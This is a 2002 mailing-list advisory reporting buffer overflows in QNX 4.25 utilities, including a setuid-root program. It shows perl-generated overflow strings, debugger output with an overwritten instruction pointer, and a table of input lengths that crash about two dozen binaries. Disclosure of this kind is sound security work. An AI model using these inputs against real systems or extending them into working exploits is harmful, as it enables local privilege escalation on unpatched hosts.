
madcr: QnX 4.25 - multiple bof in suid/non-suid files


From: Egor Egorov <madrats () mail ru>
Date: 12 Jun 2002 12:10:46 -0000



/bin/sample
----------------//------------------------------
# cd /bin
# ls -l sample
-rwsrwxr-x  1 root      root          20639 Jan 19  1996 sample
# sample `perl -e 'print "A" x 280'`
Profile based upon 2000 samples/second.

//1/bin/sample terminated (SIGSEGV) at 0005:00000041
%1  672  Memory fault      sample $(perl -e 'print "A" x 280')

# wd sample 'perl -e print "A" x 280'`
ebp: 41414141
eip: 00000041

# wd sample 'perl -e 'print "A" x 280, "B"'`
ebp: 41414141
eip: 00004241
----------------//------------------------------


/bin/ex
----------------//------------------------------
# wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
ebp: 00000041
eip: 646f6f67 - doog
----------------//------------------------------

 file         bytes of input needed to trigger the bof

/bin/du       - 558
/bin/find     - 799
/bin/lex      - 1673
/bin/mkdir    - 517
/bin/rm       - 351
/bin/serserv  - 224
/bin/tcpserv  - 146
/bin/termdef  - 729
/bin/time     - 2489
/bin/unzip    - 299
/bin/use      - 1964
/bin/wcc      - 138
/bin/wcc386   - 137
/bin/wd       -
/bin/wdisasm  - 135
/bin/which    - 304
/bin/wlib     - 256
/bin/wlink    - 10244
/bin/wpp      - 256
/bin/wpp386   - 256
/bin/wprof    - 141
/bin/write    - 157
/bin/wstrip   - 817


